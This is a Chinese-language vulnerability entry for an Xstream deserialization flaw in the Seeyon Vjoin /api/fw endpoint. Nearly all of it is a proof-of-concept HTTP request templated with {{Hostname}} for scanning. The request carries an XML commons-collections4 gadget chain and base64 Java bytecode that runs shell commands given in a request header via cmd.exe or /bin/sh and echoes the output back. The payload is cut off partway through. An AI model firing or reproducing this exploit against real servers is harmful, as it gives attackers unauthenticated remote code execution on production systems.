漏洞描述
致远Vjoin前台Xstream反序列化导致RCE
致远Vjoin api/fw存在Xstream反序列化漏洞
PoC代码
POST /api/fw HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoded: gzip, deflate
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,n-AS,fr-RN
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 6919
Content-Type: application/xml
Cookie: JSESSIONID=DD9BA127344D6A59D9BA45FCE1859746
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
<map>
<entry>
<org.apache.commons.collections4.keyvalue.TiedMapEntry>
<map class="org.apache.commons.collections4.map.LazyMap" serialization="custom">
<unserializable-parents/>
<org.apache.commons.collections4.map.LazyMap>
<default>
<factory class="org.apache.commons.collections4.functors.InvokerTransformer">
<iMethodName>newTransformer</iMethodName>
<iParamTypes/>
<iArgs/>
</factory>
</default>
<map/>
</org.apache.commons.collections4.map.LazyMap>
</map>
<key class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>t</__name>
<__bytecodes>
<byte-array>yv66vgAAADEBDwEAFVBheWxvYWQyNjg5NTYyNjAwOTkwMAcAAQEAQGNvbS9zdW4vb3JnL2FwYWNo
ZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAY8aW5p
dD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAE
dGhpcwEAF0xQYXlsb2FkMjY4OTU2MjYwMDk5MDA7DAAFAAYKAAQADAEAEGphdmEvbGFuZy9TdHJp
bmcHAA4BAARuYW1lCAAQAQAKbmFtZXNBcnJheQEAE1tMamF2YS9sYW5nL1N0cmluZzsMABIAEwkA
BAAUAQAMZ2V0UmVxSGVhZGVyAQAVKClbTGphdmEvbGFuZy9TdHJpbmc7AQAOQWNjZXB0LUVuY29k
ZWQIABgBAA1nemlwLCBkZWZsYXRlCAAaAQANZ2V0UmVzcEhlYWRlcgEAEFRyYW5zZmVyLWVuY29k
ZWQIAB0BAAdjaHVua2VkCAAfAQAHZ2V0RGF0YQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEv
bGFuZy9TdHJpbmc7AQAGd2hvYW1pCAAjAQAJd3JpdGVCb2R5AQAnKExqYXZhL2xhbmcvT2JqZWN0
O0xqYXZhL2xhbmcvU3RyaW5nOylWAQAQamF2YS9sYW5nL09iamVjdAcAJwEACGdldENsYXNzAQAT
KClMamF2YS9sYW5nL0NsYXNzOwwAKQAqCgAoACsBAAlnZXRXcml0ZXIIAC0BAA9qYXZhL2xhbmcv
Q2xhc3MHAC8BAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xh
c3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAAxADIKADAAMwEAGGphdmEvbGFuZy9yZWZs
ZWN0L01ldGhvZAcANQEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9P
YmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwANwA4CgA2ADkBAAV3cml0ZQgAOwEABWZsdXNoCAA9
AQAFY2xvc2UIAD8BAApFeGNlcHRpb25zAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcAQgEADWdldEZp
ZWxkVmFsdWUBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xh
bmcvT2JqZWN0OwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkBwBGAQAQZ2V0RGVjbGFyZWRGaWVs
ZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwASABJCgAw
AEoBAA1nZXRTdXBlcmNsYXNzDABMACoKADAATQEAImphdmEvbGFuZy9yZWZsZWN0L0FjY2Vzc2li
bGVPYmplY3QHAE8BAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAUQBSCgBQAFMBAANnZXQBACYoTGph
dmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAVQBWCgBHAFcBAARlY2hvAQAQamF2
YS9sYW5nL1RocmVhZAcAWgEACmdldFRocmVhZHMIAFwBABFnZXREZWNsYXJlZE1ldGhvZAwAXgAy
CgAwAF8BABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBhAQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9T
dHJpbmc7DABjAGQKAFsAZQEAHENvbnRhaW5lckJhY2tncm91bmRQcm9jZXNzb3IIAGcBAAhjb250
YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAaQBqCgAPAGsBAARleGVjCABtAQAE
aHR0cAgAbwEABnRhcmdldAgAcQwARABFCgACAHMBABJqYXZhL2xhbmcvUnVubmFibGUHAHUBAAZ0
aGlzJDAIAHcBAAdzZXJ2aWNlCAB5AQAKY29ubmVjdG9ycwgAewEAE1tMamF2YS9sYW5nL09iamVj
dDsHAH0BAA9wcm90b2NvbEhhbmRsZXIIAH8BAAhjSGFuZGxlcggAgQEAB2hhbmRsZXIIAIMBAAZn
bG9iYWwIAIUBAApwcm9jZXNzb3JzCACHAQATamF2YS91dGlsL0FycmF5TGlzdAcAiQEABHNpemUB
AAMoKUkMAIsAjAoAigCNAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABVAI8KAIoAkAEAA3JlcQgA
kgEACWdldEhlYWRlcggAlAwAFgAXCgACAJYBAAdpc0VtcHR5AQADKClaDACYAJkKAA8AmgwAIQAi
CgACAJwBAAdnZXROb3RlCACeAQARamF2YS9sYW5nL0ludGVnZXIHAKABAARUWVBFAQARTGphdmEv
bGFuZy9DbGFzczsMAKIAowkAoQCkAQAEKEkpVgwABQCmCgChAKcBAAtnZXRSZXNwb25zZQgAqQEA
B3JlcXVlc3QIAKsBAAhyZXNwb25zZQgArQEACXNldFN0YXR1cwgArwEACWFkZEhlYWRlcggAsQwA
HAAXCgACALMIAFkBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoMALYAtwoADwC4AQAQ
amF2YS9sYW5nL1N5c3RlbQcAugEADWdldFByb3BlcnRpZXMBABgoKUxqYXZhL3V0aWwvUHJvcGVy
dGllczsMALwAvQoAuwC+AQATamF2YS91dGlsL0hhc2h0YWJsZQcAwAEACHRvU3RyaW5nDADCAGQK
AMEAwwEACGdldEJ5dGVzAQAEKClbQgwAxQDGCgAPAMcBAAdvcy5uYW1lCADJAQALZ2V0UHJvcGVy
dHkMAMsAIgoAuwDMAQALdG9Mb3dlckNhc2UMAM4AZAoADwDPAQAGd2luZG93CADRAQAHY21kLmV4
ZQgA0wEAAi9jCADVAQAHL2Jpbi9zaAgA1wEAAi1jCADZAQARamF2YS91dGlsL1NjYW5uZXIHANsB
ABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIHAN0BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWDAAF
AN8KAN4A4AEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7DADiAOMKAN4A5AEAEWphdmEv
bGFuZy9Qcm9jZXNzBwDmAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFt
OwwA6ADpCgDnAOoBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMAAUA7AoA3ADtAQADXFxBCADv
AQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7
DADxAPIKANwA8wEABG5leHQMAPUAZAoA3AD2AQAWamF2YS9sYW5nL1N0cmluZ0J1ZmZlcgcA+AoA
+QAMAQAGPT09PT09CAD7AQAGYXBwZW5kAQAsKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5n
L1N0cmluZ0J1ZmZlcjsMAP0A/goA+QD/AQAFKFtCKVYMAAUBAQoADwECCgD5AMMMACUAJgoAAgEF
AQATamF2YS9sYW5nL1Rocm93YWJsZQcBBwoBCADDAQAIPGNsaW5pdD4MAFkABgoAAgELAQAKU291
cmNlRmlsZQEAH0NvbVN1bkFic3RyYWN0VHJhbnNsZXRUZW1wLmphdmEAIQACAAQAAAAAAAgAAQAF
AAYAAQAHAAAARAAFAAEAAAASKrcADSoEvQAPWQMSEVO1ABWxAAAAAgAIAAAADgADAAAAEgAEABMA
EQAUAAkAAAAMAAEAAAASAAoACwAAAAkAFgAXAAEABwAAABsABAAAAAAADwW9AA9ZAxIZU1kEEhtT
sAAAAAAACQAcABcAAQAHAAAAGwAEAAAAA...[已截断]